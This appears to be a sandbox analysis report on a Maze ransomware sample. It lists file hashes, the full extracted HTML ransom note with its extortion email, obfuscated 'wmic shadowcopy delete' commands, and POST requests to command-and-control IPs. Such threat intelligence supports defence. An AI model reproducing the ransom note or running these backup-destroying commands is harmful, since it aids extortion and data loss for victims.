Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
839s -
max time network
839s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
-
submitted
11/06/2024, 09:53 UTC
General
-
Target
1.exe
-
Size
447KB
-
MD5
9823800f063a1d4ee7a749961db7540f
-
SHA1
9d2917a668b30ba9f6b3e7a3316553791eb1c052
-
SHA256
a9524de985a3ecc43e11dd7c051a4bbfe08c3d71cde98ea9bb6ea7f32c0cb174
-
SHA512
c48624e32dba7f08ce0ca8267e541b123c6a9bf848b81d9e62f7fc4bec9b8ed801a6204ffaece4decf0d31bf2595867ff6f8c0b176e366848b61145cc585e41e
-
SSDEEP
12288:Yn+KS3UINuBGCz0SxWUNmH2o8PXwU9Eq7zKloxTwRtjauqCXy3X:Y+FUKWAHNqXwUlzD9w7PqCin
Score
10/10
Malware Config
Extracted
Path
C:\Users\DECRYPT-FILES.html
Ransom Note
<html>
<head>
<script>
function CopyToClipboard(containerid) {
if (document.selection) {
var range = document.body.createTextRange();
range.moveToElementText(document.getElementById(containerid));
range.select().createTextRange();
document.execCommand("copy");
} else if (window.getSelection) {
var range = document.createRange();
range.selectNode(document.getElementById(containerid));
window.getSelection().addRange(range);
document.execCommand("copy");
alert("Base64 copied into the clipboard!")
}
}
</script>
<style>
html{ margin:0; padding:0; width:100%; height:100%; }
body { background: #000080; color: #ececec; font-family: Consolas };
.tooltip {
position: relative;
display: inline-block;
border-bottom: 1px dotted black;
}
.tooltip .tooltiptext {
visibility: hidden;
width: 120px;
background-color: #555;
color: #fff;
text-align: center;
border-radius: 6px;
padding: 5px 0;
position: absolute;
z-index: 1;
bottom: 125%;
left: 50%;
margin-left: -60px;
opacity: 0;
transition: opacity 0.3s;
}
.tooltip .tooltiptext::after {
content: "";
position: absolute;
top: 100%;
left: 50%;
margin-left: -5px;
border-width: 5px;
border-style: solid;
border-color: #555 transparent transparent transparent;
}
.tooltip:hover .tooltiptext {
visibility: visible;
opacity: 1;
}
p#base64{
-ms-word-break: break-all;
word-break: break-all;
-webkit-hyphens: auto;
-moz-hyphens: auto;
-ms-hyphens: auto;
hyphens: auto;
}
p#base64:hover{
cursor: hand;
}
</style>
</head>
<body>
<table style="position: absolute;" width="100%">
<tr>
<td style="width: 25%;">
<span class="left" style="font-size: 14px; font-weight: bold">CODE:
<br>------
<br>00000 00000
<br>00000 00000
<br>00000 00000
<br>00000 00000
<br>00000 00000
<br>00000 00000
<br>00000 00000
<br>00000 00000
</span>
</td>
<td style="width: 50%;">
<div style="text-align: center; font-size: 20px;">
<p><s>0010 SYSTEM FAILURE 0010</s></p>
<p>*********************************************************************************************************************</p>
<p>Attention! Your documents, photos, databases, and other important files have been encrypted!</p>
<p>*********************************************************************************************************************</p>
<br>
</div>
<div style="text-align: center; font-size: 18px;">
<p>The only way to decrypt your files, is to buy the private key from us.</p>
<p>You can decrypt one of your files for free, as a proof that we have the method to decrypt the rest of your data.</p>
<p>In order to receive the private key contact us via email: <br> <b>decryptmaze@airmail.cc</b> </p>
<p>Remember to hurry up, as your email address may not be avaliable for very long.<br>Buying the key immediatly will guarantee that 100% of your files will be restored.</p>
<p>Below you will see a big base64 blob, you will need to email us and copy this blob to us.<br>you can click on it, and it will be copied into the clipboard.</p>
<p>If you have troubles copying it, just send us the file you are currently reading, as an attachment.</p>
<br>
<p>Base64: </p>
</div><div style="text-align: center; font-size: 12px;"><p id="base64" onclick="return CopyToClipboard('base64')" class="tooltip">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<span class="tooltiptext">Click here to copy</span></p></div></td><td style="width: 25%; text-align: right;"><span class="right" style="font-size: 14px; font-weight: bold">IMMINENT SHUTDOWN:<br>------<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00</span></td></tr></table></body></html>
Emails
<b>decryptmaze@airmail.cc</b>
Signatures
-
Maze
Ransomware family also known as ChaCha.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops startup file 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\gkpd\..\Windows\wv\nxfgw\..\..\system32\pcp\cil\cdipk\..\..\..\wbem\vjivn\bf\vfd\..\..\..\wmic.exe" shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wbem\wmic.exe"C:\ttx\ejsjh\..\..\Windows\bf\..\system32\cbp\aexh\..\..\wbem\l\..\wmic.exe" shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}1⤵
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4f41⤵
Network
-
POSThttp://92.63.194.20/task/eivbweq.phpRemote address:92.63.194.20:80RequestPOST /task/eivbweq.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Host: 92.63.194.20
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
Connection: Keep-Alive
-
POSThttp://92.63.194.20/task/eivbweq.phpRemote address:92.63.194.20:80RequestPOST /task/eivbweq.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Host: 92.63.194.20
Content-Length: 253
Cache-Control: no-cache
ResponseHTTP/1.1 500 Internal Server Error
Server: nginx
Date: Tue, 11 Jun 2024 09:55:27 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 594
Connection: keep-alive
-
POSThttp://92.63.194.20/wjppfdjwcr.action?tpdp=j&jm=qqa6kd&tmpf=54fyt6k7&e=672pRemote address:92.63.194.20:80RequestPOST /wjppfdjwcr.action?tpdp=j&jm=qqa6kd&tmpf=54fyt6k7&e=672p HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Host: 92.63.194.20
Content-Length: 48
Cache-Control: no-cache
ResponseHTTP/1.1 500 Internal Server Error
Server: nginx
Date: Tue, 11 Jun 2024 09:55:31 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 594
Connection: keep-alive
-
POSThttp://92.63.194.20/wjppfdjwcr.action?tpdp=j&jm=qqa6kd&tmpf=54fyt6k7&e=672pRemote address:92.63.194.20:80RequestPOST /wjppfdjwcr.action?tpdp=j&jm=qqa6kd&tmpf=54fyt6k7&e=672p HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Host: 92.63.194.20
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Connection: Keep-Alive
-
POSThttp://92.63.194.3/elpkvcf.php?ht=2w73kilo1yRemote address:92.63.194.3:80RequestPOST /elpkvcf.php?ht=2w73kilo1y HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Host: 92.63.194.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Server: nginx/1.14.2
Date: Tue, 11 Jun 2024 09:58:37 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: https://92.63.194.3/elpkvcf.php?ht=2w73kilo1y
-
POSThttp://92.63.194.3/create/webaccess/nr.cgi?h=55pRemote address:92.63.194.3:80RequestPOST /create/webaccess/nr.cgi?h=55p HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Host: 92.63.194.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Server: nginx/1.14.2
Date: Tue, 11 Jun 2024 09:58:40 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: https://92.63.194.3/create/webaccess/nr.cgi?h=55p
-
POSThttp://92.63.15.56/check/ajm.do?osbl=y&k=51&dj=0y410Remote address:92.63.15.56:80RequestPOST /check/ajm.do?osbl=y&k=51&dj=0y410 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Host: 92.63.15.56
Content-Type: application/x-www-form-urlencoded
Content-Length: 253
Connection: Keep-Alive
-
POSThttp://92.63.15.56/check/ajm.do?osbl=y&k=51&dj=0y410Remote address:92.63.15.56:80RequestPOST /check/ajm.do?osbl=y&k=51&dj=0y410 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Host: 92.63.15.56
Content-Length: 253
Cache-Control: no-cache
-
92.63.8.47:80
-
92.63.8.47:80
-
92.63.8.47:80
-
92.63.8.47:80
-
92.63.8.47:80
-
92.63.8.47:80
-
92.63.32.2:80 -
92.63.32.2:80
-
92.63.32.2:80
-
92.63.37.100:80
-
92.63.32.2:80
-
92.63.32.2:80
-
92.63.32.2:80
-
92.63.37.100:80
-
92.63.37.100:80
-
92.63.37.100:80
-
92.63.37.100:80
-
92.63.37.100:80
-
92.63.194.20:80http://92.63.194.20/task/eivbweq.phphttp
HTTP Request
POST http://92.63.194.20/task/eivbweq.php -
92.63.194.20:80http://92.63.194.20/wjppfdjwcr.action?tpdp=j&jm=qqa6kd&tmpf=54fyt6k7&e=672phttp
HTTP Request
POST http://92.63.194.20/task/eivbweq.phpHTTP Response
500HTTP Request
POST http://92.63.194.20/wjppfdjwcr.action?tpdp=j&jm=qqa6kd&tmpf=54fyt6k7&e=672pHTTP Response
500 -
92.63.17.245:80 -
92.63.194.20:80http://92.63.194.20/wjppfdjwcr.action?tpdp=j&jm=qqa6kd&tmpf=54fyt6k7&e=672phttp
HTTP Request
POST http://92.63.194.20/wjppfdjwcr.action?tpdp=j&jm=qqa6kd&tmpf=54fyt6k7&e=672p -
92.63.17.245:80
-
92.63.17.245:80
-
92.63.17.245:80
-
92.63.17.245:80
-
92.63.17.245:80
-
92.63.32.55:80
-
92.63.32.55:80
-
92.63.32.55:80
-
92.63.32.55:80
-
92.63.32.55:80
-
92.63.32.55:80
-
92.63.11.151:80
-
92.63.11.151:80
-
92.63.11.151:80
-
92.63.11.151:80
-
92.63.11.151:80
-
92.63.11.151:80
-
92.63.194.3:80http://92.63.194.3/elpkvcf.php?ht=2w73kilo1yhttp
HTTP Request
POST http://92.63.194.3/elpkvcf.php?ht=2w73kilo1yHTTP Response
301 -
92.63.15.8:80
-
92.63.194.3:80http://92.63.194.3/create/webaccess/nr.cgi?h=55phttp
HTTP Request
POST http://92.63.194.3/create/webaccess/nr.cgi?h=55pHTTP Response
301 -
92.63.15.8:80
-
92.63.15.8:80
-
92.63.15.8:80
-
92.63.15.8:80
-
92.63.15.8:80
-
92.63.29.137:80
-
92.63.29.137:80
-
92.63.29.137:80
-
92.63.29.137:80
-
92.63.29.137:80
-
92.63.29.137:80
-
92.63.32.57:80
-
92.63.32.57:80
-
92.63.32.57:80
-
92.63.32.57:80
-
92.63.32.57:80
-
92.63.32.57:80
-
92.63.15.56:80http://92.63.15.56/check/ajm.do?osbl=y&k=51&dj=0y410http
HTTP Request
POST http://92.63.15.56/check/ajm.do?osbl=y&k=51&dj=0y410 -
92.63.15.56:80http://92.63.15.56/check/ajm.do?osbl=y&k=51&dj=0y410http
HTTP Request
POST http://92.63.15.56/check/ajm.do?osbl=y&k=51&dj=0y410
No results found
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
940B
MD5f13f4e3a383bb12b52e273402e84798f
SHA1fc2f95956fa4519443d8b6640726a8e7932939f0
SHA256c6c3bc3fa935f72988f1048758333f72586f27460fb9951e5fed8188bee173ad
SHA512f98ee73b0e62573f67f2f8006b7b7a10d8f00733771bd1f709e08f124726312aae1628496b3731016e5ddd00d46a48090fe711ae72aa2521821b3051675755a0
-
Filesize
6KB
MD5d01c34d28fd1a25c66496f36390d8a88
SHA14c394b701b18ab2c18c9538a49b5131ce536638b
SHA256a8c25844e71980dde83d9ceb07e07982590ad401261570799551ed7647eb055e
SHA512130bad9b617119c2d5fbb1bd154657cda3d3f006917994b713a5bb6799c3c07c479c3f6ac3b730ce3b7549794e4a0824649c4575e338ed726df3c3e5f3199b87
-
Filesize
356KB
-
Filesize
360KB
-
Filesize
360KB
-
Filesize
360KB
-
Filesize
360KB
-
Filesize
360KB
-
Filesize
360KB